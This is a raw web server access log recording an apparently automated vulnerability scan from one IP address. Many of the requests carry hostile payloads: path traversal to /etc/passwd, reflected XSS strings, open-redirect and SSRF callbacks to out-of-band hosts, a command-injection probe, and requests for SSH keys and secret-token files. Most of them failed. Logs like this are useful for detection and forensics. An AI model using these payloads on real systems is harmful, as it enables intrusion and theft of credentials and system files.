195.164.49.69 - - [20/Oct/2024:16:14:50 +0000] GET /?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:14:52 +0000] GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:14:54 +0000] GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1 404 1109
- - - [20/Oct/2024:16:14:55 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:14:57 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:15:00 +0000] GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:15:02 +0000] GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:15:05 +0000] GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:16:15:05 +0000] GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:16:15:06 +0000] GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:16:15:07 +0000] GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:16:15:24 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:15:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:15:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:15:30 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:15:32 +0000] GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1 404 1146
195.164.49.69 - - [20/Oct/2024:16:15:38 +0000] GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:15:40 +0000] GET /session/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:15:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:15:44 +0000] POST /kindeditor/php/demo.php HTTP/1.1 404 1105
83.212.98.101 - - [20/Oct/2024:16:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:15:46 +0000] POST /php/demo.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:15:48 +0000] GET /index.php/login HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:15:52 +0000] POST /apisix/admin/routes HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:15:54 +0000] GET /2ni16AlqVA0d4X8NRk4nOJUNqPT?cmd=id HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:15:56 +0000] POST /menu/stapp HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:15:58 +0000] POST /webtools/control/xmlrpc HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:16:00 +0000] GET /wp-content/plugins/elementor/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:16:02 +0000] GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:16:16:04 +0000] POST /cas/v1/tickets/ HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:16:06 +0000] GET /iupjournals/index.php/esj HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:16:08 +0000] POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:16:13 +0000] POST /mod/lti/auth.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:16:15 +0000] GET /goform/downloadSyslog/syslog.log HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:16:19 +0000] GET /admin/login/index.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:16:27 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:16:31 +0000] GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:16:35 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:16:37 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:16:16:40 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:16:40 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:16:43 +0000] POST /api/2.0/mlflow/users/create HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:16:44 +0000] POST /protocol/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:16:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:16:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:16:52 +0000] POST /models/apply HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:16:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:16:58 +0000] POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:16:17:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:17:02 +0000] GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:17:04 +0000] POST /api/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:17:06 +0000] POST /api/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:17:09 +0000] POST /api/login HTTP/1.1 404 1087
83.212.98.101 - - [20/Oct/2024:16:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:17:53 +0000] POST /ui/login HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:17:54 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:16:17:55 +0000] GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:16:17:57 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1 404 1172
195.164.49.69 - - [20/Oct/2024:16:17:57 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1 404 1174
195.164.49.69 - - [20/Oct/2024:16:17:57 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1 404 1175
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /jolokia/read/java.lang:type=Memory HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1 404 1167
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1 404 1171
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1 404 1173
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:16:17:58 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1 404 1174
195.164.49.69 - - [20/Oct/2024:16:17:59 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1 404 1154
195.164.49.69 - - [20/Oct/2024:16:17:59 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:16:17:59 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:16:18:26 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:18:28 +0000] GET /phpMyAdminOLD/setup/index.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:18:32 +0000] GET /phpmyadmin/scripts/setup.php HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:18:32 +0000] GET /phpMyAdmin/scripts/setup.php HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /_phpmyadmin/scripts/setup.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /php/phpmyadmin/scripts/setup.php HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /web/phpmyadmin/scripts/setup.php HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:16:18:33 +0000] GET /phpmyadmin/setup/index.php HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:18:34 +0000] GET /pma/setup/index.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:18:34 +0000] GET /admin/pma/setup/index.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:18:34 +0000] GET /phpmyadmin/setup/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:18:34 +0000] GET /setup/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:18:34 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:19:00 +0000] GET /modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:19:02 +0000] GET /modules/mod_jvtwitter/jvtwitter.php?id HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:19:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:19:20 +0000] GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:19:22 +0000] GET /?s=8pzHYh%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/8El/ HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:19:24 +0000] GET /wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:19:26 +0000] GET /libraries/joomla/database/ HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:19:28 +0000] GET /ESPEasy HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:19:30 +0000] GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:19:32 +0000] GET /search.htm?searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:19:34 +0000] GET /ads/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:19:36 +0000] GET /adserve/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:19:38 +0000] GET /adserver/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:19:40 +0000] GET /openx/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:19:42 +0000] GET /revive/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:19:44 +0000] GET /www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:19:46 +0000] GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:16:19:48 +0000] GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0 HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:19:50 +0000] GET /cgi-bin/printenv.pl HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:19:52 +0000] GET /preview.php/mn71q%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ep15vr?cat_id&p=2 HTTP/1.1 404 1157
195.164.49.69 - - [20/Oct/2024:16:19:54 +0000] GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
- - - [20/Oct/2024:16:19:56 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:19:58 +0000] GET /index.php?redirect=//interact.sh HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:20:01 +0000] GET /?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:20:03 +0000] GET /xmldata?item=CpqKey HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:20:05 +0000] GET /?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:20:07 +0000] GET /node_modules/../../../../../etc/passwd HTTP/1.1 400 1160
- - - [20/Oct/2024:16:20:09 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:20:11 +0000] GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/2ni16FpGlVUv3Y6KqeEPXyMpinO/);marmoset.embed(%27a HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:20:13 +0000] GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:20:15 +0000] GET //interact.sh/%2f.. HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:20:17 +0000] GET /plesk-stat/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:20:19 +0000] GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:20:21 +0000] GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:20:23 +0000] GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:20:25 +0000] GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:20:27 +0000] GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:20:29 +0000] GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:20:31 +0000] GET /s/2ni16CPQYgx3XVNZh8jdyuAb9gl/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1 404 1217
195.164.49.69 - - [20/Oct/2024:16:20:33 +0000] GET /s/2ni16CPQYgx3XVNZh8jdyuAb9gl/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 404 1205
195.164.49.69 - - [20/Oct/2024:16:20:35 +0000] GET /_vti_bin/lists.asmx?WSDL HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:20:37 +0000] GET /phinx.yml HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:20:39 +0000] GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:20:41 +0000] GET /plus/feedback.php/rp4hu%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E?aid=3 HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:16:20:43 +0000] GET /xwiki/bin/view/Main/?viewer=share&send=1&target&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message=2ni16Ao6A7TqIqgqqBtoPYsEzCB HTTP/1.1 404 1110
- - - [20/Oct/2024:16:20:45 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [20/Oct/2024:16:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
- - - [20/Oct/2024:16:20:48 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:20:49 +0000] GET /steve/services/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/services/ HTTP/1.1 404 1176
195.164.49.69 - - [20/Oct/2024:16:20:51 +0000] GET /services/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/services/ HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:16:20:53 +0000] GET /jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:16:20:55 +0000] GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:20:57 +0000] GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1 404 1134
- - - [20/Oct/2024:16:20:59 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:21:01 +0000] GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:21:03 +0000] GET /wp-admin?piereg_logout_url=true&redirect_to=https://oast.me HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:21:05 +0000] GET /?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:21:07 +0000] GET /wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:16:21:09 +0000] GET /documentation/playwright.config.js HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:21:11 +0000] GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:21:17 +0000] GET /web/session/logout?redirect=https://oast.me HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:21:19 +0000] GET /web/session/logout?redirect=https%3a%2f%2foast.me%2f HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:21:21 +0000] GET /web/dbredirect?redirect=https%3a%2f%2foast.me%2f HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:21:22 +0000] GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:21:24 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:21:26 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:21:28 +0000] GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1 404 1098
- - - [20/Oct/2024:16:21:30 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:21:32 +0000] GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:21:34 +0000] GET /V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:16:21:36 +0000] GET /ioncube/loader-wizard.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:21:38 +0000] GET /loader-wizard.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:21:40 +0000] GET /api/v1/GetSrc HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:21:42 +0000] GET /api/v1/GetDevice HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:21:44 +0000] GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:21:46 +0000] GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:21:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:21:50 +0000] GET /mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:21:52 +0000] GET /mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:21:54 +0000] GET /de2api/engine/getEngine;.js HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:21:56 +0000] GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:21:58 +0000] GET /ajax/telemetry.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:22:00 +0000] GET /glpi/ajax/telemetry.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:22:02 +0000] GET /users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:16:22:04 +0000] GET /wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt HTTP/1.1 404 1154
195.164.49.69 - - [20/Oct/2024:16:22:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:22:08 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:22:10 +0000] GET /rootDesc.xml HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:22:12 +0000] GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:22:14 +0000] GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:22:16 +0000] GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:22:18 +0000] GET /apiserver-etcd-client.key HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:22:21 +0000] GET /secret_token.rb HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:22:23 +0000] GET /config/initializers/secret_token.rb HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:22:25 +0000] GET /redmine/config/initializers/secret_token.rb HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:16:22:26 +0000] GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/ HTTP/1.1 404 1129
83.212.98.101 - - [20/Oct/2024:16:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:22:28 +0000] GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1 404 1138
- - - [20/Oct/2024:16:22:30 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:22:32 +0000] GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:22:34 +0000] GET /file=https://oast.me HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:22:36 +0000] GET /data/v3/?key=%27-alert(document.domain)-%27 HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:22:38 +0000] GET /.ssh/authorized_keys HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:22:40 +0000] GET /_/.ssh/authorized_keys HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:22:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:22:44 +0000] GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:16:22:46 +0000] GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:22:48 +0000] GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:22:49 +0000] GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:16:22:51 +0000] GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1 404 1143
